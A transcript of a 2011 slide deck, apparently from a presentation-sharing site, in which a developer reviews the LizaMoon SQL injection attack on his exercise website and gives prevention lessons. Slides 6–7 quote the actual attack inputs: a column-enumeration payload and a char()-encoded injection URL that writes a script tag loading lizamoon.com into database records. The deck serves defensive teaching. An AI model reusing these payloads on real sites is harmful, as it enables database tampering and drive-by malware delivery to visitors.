Presentation is loading. Please wait.

Presentation is loading. Please wait.

March 2011 LizaMoon SQL Injection Attack Lessons Learnt From a Close Call And How to Protect Your Site

Published byEverett Butler Modified over 9 years ago

Similar presentations

Presentation on theme: "March 2011 LizaMoon SQL Injection Attack Lessons Learnt From a Close Call And How to Protect Your Site"— Presentation transcript:

1 March 2011 LizaMoon SQL Injection Attack Lessons Learnt From a Close Call And How to Protect Your Site http://www.petermessenger.com

2 What was LizaMoon Method – Automated SQL Injection Attack – Targeted old or poorly written, insecure websites – Added strings to database Aim – Redirects user to malware – fake virus scanning website Result – 1.5 million URLs were affected

3 What is SQL Injection? SQL injection is done by passing in text to your sql statement that you were not expecting. – http://www.unixwiz.net/techtips/sql- injection.html http://www.unixwiz.net/techtips/sql- injection.html Allows hackers to get access to your database and potentially gain confidential information or just do malicious damage

4 A real world example Website written 8+ years ago Has a combo box at the top of the page with language selection Language selection can also be passed in a request parameter Ie ExerciseSearch.aspx?Lang=English

5 Poor Coding Practice Combo box was being populated via sql call – String.Format("Select Lang, Code1 From Tbl_Exercise_Languages Where LangStatus=1 Or Lang='{0}'", LangSelected) This is POOR PRACTICE SQL calls should also be parameterized SQL inputs should always be validated before being run – In my defence this was then only time I did this, all other calls were done properly, as this was added a last minute thing

6 How they got in The automated program, passes in for the request parameter – English’Select Column_Name, Table_Name From INFORMATION_SCHEMA.COLUMNS Where DATA_TYPE In ('nvarchar','nchar','char','text'); Print’ So you then have two sql scripts running – Select Lang, Code1 From Tbl_Exercise_Languages Where LangStatus=1 Or Lang='English’ – Select Column_Name, Table_Name From INFORMATION_SCHEMA.COLUMNS Where DATA_TYPE In ('nvarchar','nchar','char','text'); – Print’’; Monitor traffic back, and your have now know every text column and table in the entire database.

7 How they got in Example of them updating database http://www.physiotherapyexercises.com/ExerciseSearch.aspx ?Lang=English1'+update+Tbl_Patients+set+PatientLastName= cast(PatientLastName+as+varchar(8000))+cast(char(60)+char( 47)+char(116)+char(105)+char(116)+char(108)+char(101)+ch ar(62)+char(60)+char(115)+char(99)+char(114)+char(105)+ch ar(112)+char(116)+char(32)+char(115)+char(114)+char(99)+c har(61)+char(104)+char(116)+char(116)+char(112)+char(58)+ char(47)+char(47)+char(108)+char(105)+char(122)+char(97)+ char(109)+char(111)+char(111)+char(110)+char(46)+char(99) +char(111)+char(109)+char(47)+char(117)+char(114)+char(46 )+char(112)+char(104)+char(112)+char(62)+char(60)+char(47 )+char(115)+char(99)+char(114)+char(105)+char(112)+char(1 16)+char(62)+as+varchar(8000))--

8 Lessons Learnt Don’t write SQL scripts on the fly Always use stored procedures Always use parameters Perform validation on anything from the user Think about limiting what client facing sql account can do Think about some evil bastard may corrupt what you do. Use Microsoft’s protection provided – http://www.microsoft.com/downloads/en/details.aspx?Fa milyID=f4cd231b-7e06-445b-bec7-343e5884e651

Download ppt "March 2011 LizaMoon SQL Injection Attack Lessons Learnt From a Close Call And How to Protect Your Site"

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
DEV333. Describe each main attack Demo how the attack works Fix our poor vulnerable application! Why Script Kiddies, Why? Click to Hack.

DEV333. Describe each main attack Demo how the attack works Fix our poor vulnerable application! Why Script Kiddies, Why? Click to Hack.
Understand Database Security Concepts

Understand Database Security Concepts
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
1. What is SQL Injection 2. Different varieties of SQL Injection 3. How to prevent it.

1. What is SQL Injection 2. Different varieties of SQL Injection 3. How to prevent it.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Robofest 2001 Online Management System Jim Needham MCS 4833/01 Senior Project Dr. Chan-Jin Chung, Ph.D.

Robofest 2001 Online Management System Jim Needham MCS 4833/01 Senior Project Dr. Chan-Jin Chung, Ph.D.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
Chapter 7 Managing Data Sources. ASP.NET 2.0, Third Edition2.

Chapter 7 Managing Data Sources. ASP.NET 2.0, Third Edition2.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.

Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.

Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
Secure Software Engineering: Input Vulnerabilities

Secure Software Engineering: Input Vulnerabilities
MIS 5211.001 Week 11 Site:

MIS Week 11 Site:
Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science.

Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science.
(CPSC620) Sanjay Tibile Vinay Deore. Agenda  Database and SQL  What is SQL Injection?  Types  Example of attack  Prevention  References.

(CPSC620) Sanjay Tibile Vinay Deore. Agenda  Database and SQL  What is SQL Injection?  Types  Example of attack  Prevention  References.

Similar presentations

Ads by Google